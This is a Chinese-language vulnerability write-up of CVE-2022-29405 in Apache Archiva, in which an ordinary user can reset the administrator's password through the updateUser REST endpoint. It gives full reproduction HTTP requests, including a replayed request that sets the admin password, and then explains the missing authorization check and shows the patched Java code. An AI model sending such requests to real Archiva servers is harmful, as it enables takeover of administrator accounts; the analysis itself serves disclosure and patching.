当前位置: 首页 > news >正文

CVE-2022-29405 Apache Archiva任意用户密码重置漏洞分析

news 2025/9/12 6:17:32

Apache Archiva是一套可扩展的Artifact Repository管理系统。它能够与Maven,Continuum和ANT等构建工具完美结合。Archiva提供的功能包括:远程Repository代理,基于角色的安全访问管理,Artifact分发、维护、查询,生成使用报告,提供基于Web的管理界面等。

Apache Archiva 管理员创建的普通用户,其权限设置不当,导致普通用户可以修改任意用户信息。

影响版本

Apache Archiva 全版本(<=2.2.7)

项目地址GitHub - apache/archiva: Apache Archiva Repository

漏洞复现

1,创建管理员账号 admin:admin123

2,创建普通账号 user:user123 (勾选 validated)

3,将编辑admin账号密码的包抓取下来

POST /restServices/redbackServices/userService/updateUser HTTP/1.1
Host: 10.66.64.106:8080
Content-Length: 752
Accept: application/json, text/javascript, */*; q=0.01
X-XSRF-TOKEN: [替换值]
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
Content-Type: application/json
Origin: http://10.66.64.106:8080
Referer: http://10.66.64.106:8080/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [替换值]
Connection: close
​
{"username":"admin","password":"admin123","confirmPassword":"admin123","fullName":"the administrator","email":"admin@admin.com","permanent":true,"validated":true,"timestampAccountCreation":"Mon, 1 Apr 2024 05:36:44 +0000 - 5 minutes ago","timestampLastLogin":null,"timestampLastPasswordChange":"Mon, 1 Apr 2024 05:36:44 +0000 - 5 minutes ago","locked":false,"passwordChangeRequired":false,"assignedRoles":["Global Repository Manager","Global Repository Observer","Repository Manager - internal","Repository Manager - snapshots","Repository Observer - internal","Repository Observer - snapshots","System Administrator","User Administrator"],"modified":true,"readOnly":false,"userManagerId":"jdo","rememberme":false,"validationToken":null,"logged":false}

4,登录普通账号 替换值后发送上面抓取的包

 

POST /restServices/redbackServices/userService/updateUser HTTP/1.1
Host: 10.66.64.106:8080
Content-Length: 750
Accept: application/json, text/javascript, */*; q=0.01
X-XSRF-TOKEN: I1ngx29RJKOGWU+mBxHVfK39m8LWeZpH3GGPmN/AVxHaaAa7+TUveJDvO48Z+KgQdclv7P8Zga9ZowMgEW0Q+Pm9q7kq2s0f7M0dUjrvNaislYP18IDjg18zey0jTvGlQlISdTOikY23gVn5+C5AZcJp5mxN3LsB6OWWpFweD4pBgJwUc1ij38n4w5nOUA0l4k8/Q3YoGDRvKL3mK5QTQVpCDt89dxXI0xpH+VYhLkdOTvJlE1WMXV8XN1Hev/Ipvr6XBlhl2tKRvnnWTD8GgxULnBdFdo6EQ4JBYYoWih8YCbSC6vIQCmyGQhkzulIDnCmqsiLH4s4c9Y6Uqeohnw==
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
Content-Type: application/json
Origin: http://10.66.64.106:8080
Referer: http://10.66.64.106:8080/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=n2pfvjl209zinxflbferxloq; archiva_login=%7B%22username%22%3A%22user%22%2C%22password%22%3Anull%2C%22confirmPassword%22%3Anull%2C%22fullName%22%3A%22user123%22%2C%22email%22%3A%22user123%40user123.com%22%2C%22permanent%22%3Afalse%2C%22validated%22%3Atrue%2C%22timestampAccountCreation%22%3Anull%2C%22timestampLastLogin%22%3Anull%2C%22timestampLastPasswordChange%22%3Anull%2C%22locked%22%3Afalse%2C%22passwordChangeRequired%22%3Afalse%2C%22assignedRoles%22%3A%5B%5D%2C%22modified%22%3Afalse%2C%22readOnly%22%3Afalse%2C%22userManagerId%22%3Anull%2C%22rememberme%22%3Afalse%2C%22validationToken%22%3A%22I1ngx29RJKOGWU%2BmBxHVfK39m8LWeZpH3GGPmN%2FAVxHaaAa7%2BTUveJDvO48Z%2BKgQdclv7P8Zga9ZowMgEW0Q%2BPm9q7kq2s0f7M0dUjrvNaislYP18IDjg18zey0jTvGlQlISdTOikY23gVn5%2BC5AZcJp5mxN3LsB6OWWpFweD4pBgJwUc1ij38n4w5nOUA0l4k8%2FQ3YoGDRvKL3mK5QTQVpCDt89dxXI0xpH%2BVYhLkdOTvJlE1WMXV8XN1Hev%2FIpvr6XBlhl2tKRvnnWTD8GgxULnBdFdo6EQ4JBYYoWih8YCbSC6vIQCmyGQhkzulIDnCmqsiLH4s4c9Y6Uqeohnw%3D%3D%22%2C%22logged%22%3Afalse%7D
Connection: close
​
{"username":"admin","password":"user456","confirmPassword":"user456","fullName":"the administrator","email":"admin@admin.com","permanent":true,"validated":true,"timestampAccountCreation":"Mon, 1 Apr 2024 05:36:44 +0000 - 5 minutes ago","timestampLastLogin":null,"timestampLastPasswordChange":"Mon, 1 Apr 2024 05:36:44 +0000 - 5 minutes ago","locked":false,"passwordChangeRequired":false,"assignedRoles":["Global Repository Manager","Global Repository Observer","Repository Manager - internal","Repository Manager - snapshots","Repository Observer - internal","Repository Observer - snapshots","System Administrator","User Administrator"],"modified":true,"readOnly":false,"userManagerId":"jdo","rememberme":false,"validationToken":null,"logged":false}

5, 使用修改后的密码 登录管理员账号

现在查看 管理员账号admin 的密码是否被我们修改为了user456

漏洞验证成功

漏洞分析

userService 中的updateUser 方法

 

该方法 ,必须要有"user-management-user-edit"权限才能访问,然而我们普通也会有这个权限

跟过去这个实现方法updateUser

可以看到所有的参数均由前端传入, 可以造成越权.............

后续修复

 


public Boolean updateUser(User user) throws RedbackServiceException {RedbackRequestInformation redbackRequestInformation = RedbackAuthenticationThreadLocal.get();if (redbackRequestInformation != null && redbackRequestInformation.getUser() != null) {if (user == null) {throw new RedbackServiceException(new ErrorMessage("user parameter is mandatory"), Status.BAD_REQUEST.getStatusCode());} else if (!StringUtils.equals(redbackRequestInformation.getUser().getUsername(), user.getUsername()) && !StringUtils.equals(redbackRequestInformation.getUser().getUsername(), "admin")) {throw new RedbackServiceException(new ErrorMessage("you can update only your profile"), Status.FORBIDDEN.getStatusCode());} else {try {org.apache.archiva.redback.users.User rawUser = this.userManager.findUser(user.getUsername(), false);rawUser.setFullName(user.getFullName());rawUser.setEmail(user.getEmail());rawUser.setValidated(user.isValidated());rawUser.setLocked(user.isLocked());rawUser.setPassword(user.getPassword());rawUser.setPasswordChangeRequired(user.isPasswordChangeRequired());rawUser.setPermanent(user.isPermanent());this.userManager.updateUser(rawUser);return Boolean.TRUE;} catch (UserNotFoundException var4) {throw new RedbackServiceException(var4.getMessage());} catch (UserManagerException var5) {throw new RedbackServiceException(new ErrorMessage(var5.getMessage()));}}} else {this.log.warn("RedbackRequestInformation from ThreadLocal is null");throw new RedbackServiceException(new ErrorMessage("you must be logged to update your profile"), Status.FORBIDDEN.getStatusCode());}
}

可以看到前端传入的Username做了再次的校验对比了redbackRequestInformation的username值

http://www.lryc.cn/news/329955.html

相关文章:

  • ssm框架配置文件例子
  • maven构建项目报错:Failure to find com.microsoft.sqlserver:sqljdbc4:jar:4.0 in
  • 已解决rabbitmq AMQPConnectionClosedException:管道破裂或连接关闭异常的正确解决方法,亲测有效!!!
  • Excel 隔几行批量插入空白行
  • 2024年04月在线IDE流行度最新排名
  • 如何通过Elasticsearch实现搜索的关键词达到高亮的效果
  • 真实sql注入以及小xss--BurpSuite联动sqlmap篇
  • Java类和对象练习题
  • Qt 实现简易的视频播放器,功能选择视频,播放,暂停,前进,后退,进度条拖拉,视频时长显示
  • vue基础教程(6)——构建项目级登录页
  • C++宝强越狱1.0.6版本
  • 构建高可用性数据库架构:深入探索Oracle Active Data Guard(ADG)
  • 记录-rosbag的处理
  • 用Wireshark解码H.264
  • Flink中几个关键问题总结
  • 华为配置ARP安全综合功能实验
  • new mars3d.layer.XyzLayer({的rectangle瓦片数据的矩形区域范围说明
  • 数据分析之Tebleau可视化:折线图、饼图、环形图
  • 【Frida】【Android】 07_爬虫之网络通信库HttpURLConnection
  • 算法2.6基数排序
  • redis -List
  • ARMv8-A架构下的外部debug模型(external debug)简介
  • DevOps入门
  • Docker搭建私有镜像仓库
  • 流行的API架构学习
  • 问题解决:Fatal Python error: initfsencoding: unable to load the file system codec
  • WPF —— TreeView树形控件
  • 2024.2.20力扣每日一题——从前序和中序遍历序列构建二叉树
  • c++ 小游戏(2种)
  • 电阻详解:定义、公式、影响因素及电阻器类型解析